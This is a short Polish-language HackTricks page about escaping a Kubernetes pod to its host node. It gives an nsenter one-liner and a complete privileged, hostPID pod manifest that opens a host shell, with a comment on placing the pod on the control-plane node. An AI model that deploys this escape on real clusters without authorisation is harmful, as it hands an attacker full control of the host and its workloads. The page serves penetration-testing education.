Pod Escape Privileges

Dowiedz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Dowiedz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wesprzyj HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Udostępnij sztuczki hakerskie, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

Uprawnienia uprzywilejowane i hostPID

Dzięki tym uprawnieniom będziesz miał dostęp do procesów hosta oraz wystarczające uprawnienia, aby wejść do przestrzeni nazw jednego z procesów hosta. Zauważ, że potencjalnie nie będziesz potrzebować uprzywilejowanych, ale tylko pewne zdolności i inne potencjalne obejścia obrony (takie jak apparmor i/lub seccomp).

Po prostu wykonanie czegoś w stylu poniższego pozwoli Ci uciec z kontenera:

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Przykład konfiguracji:

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name

Ucz się i praktykuj Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i praktykuj Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wesprzyj HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Udostępnij sztuczki hakerskie, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów na githubie.

PreviousAbusing Roles/ClusterRoles in Kubernetes NextKubernetes Roles Abuse Lab

Last updated 1 month ago